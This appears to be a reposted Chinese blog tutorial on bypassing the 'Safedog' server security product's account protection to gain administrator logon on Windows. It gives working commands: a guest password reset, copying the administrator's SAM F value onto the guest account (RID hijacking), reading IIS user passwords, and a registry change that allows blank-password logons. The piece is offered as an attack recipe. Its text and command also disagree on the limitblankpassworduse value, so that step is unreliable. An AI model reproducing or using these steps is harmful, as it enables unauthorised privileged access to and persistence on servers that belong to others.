你還在為有安全狗而不能添加用戶而煩惱么？那快來看~只需三步，在最新服務器安全狗4.0.05221賬號保護全開的狀態下，我是如何用guest獲取登陸權限的.前提是要有提權exp哦~

服務器安全狗，在賬戶保護全開的狀態下，是不可以添加用戶的，但是并沒有限制查看和修改密碼的權限，這個是不容否認的，就算不允許修改密碼，也可以讀出iis用戶密碼明文，那么安全狗賬戶限制就如同虛設~

打狗棍法第一式

首先，用guest，演示一下，具體操作是通過注冊表，篡改sam下用戶的F值，使其達到管理權限.

首先，你必須有提權的exp,使自己達到system權限,大家都知道,administrator對應值是1F4,GUEST是1F5，如果有例外，下面會講到。

下面是步驟:

1.使用net1 user guset 1 ,將guest密碼重置為1，無需過問是否禁用

2.

reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4” “x:\1.reg”

導出administrator的注冊表值到某路徑,修改內容，將”V”值刪除，只留F值,將1F4修改為1F5,保存。

3.使用regedit /s x:/1.reg 導入注冊表

就可以使用，guest 密碼 1登陸了。

安全狗說:

在賬戶保護全開的情況下，如果不能更改密碼呢？！

打狗棍法第二式

如果真的不能更改密碼呢？則使用vbs查看iis用戶密碼，再使用

reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\names\用戶名” “x:\2.reg”

查看其對應值，再重復以上第二步和第三步，使用查看到的明文密碼登陸

安全狗又說：

如果不允許修改密碼，iis用戶是禁止登陸遠程桌面的呢？

打狗棍法第三式

對啊，我們該怎么辦？繼續聽我說，大家都知道guest是空密碼，那我們就使用空密碼登陸。

執行

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v limitblankpassworduse /t REG_DWORD /d 0 /f

修改limitblankpassworduse值為1，重復上面第二第三步驟，繼續登陸。

oh ye~

轉自：http://www.2cto.com/Article/201403/289639.html

ps:本文過狗的思路是如果允許改密碼，將guest用戶的密碼修改，然后通過注冊表操作將guest加入到管理員組中。如果安全狗禁止修改用戶密碼，則使用vbs讀取iis用戶的密碼，然后再通過注冊表操作將iis用戶加入到管理員組中。如果安全狗禁止了iis用戶的遠程登錄，則設置允許guest密碼為空，然后通過guest來進行遠程登錄。

總結

以上是生活随笔為你收集整理的安全狗限制计算机名,绕过安全狗用户限制提权的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。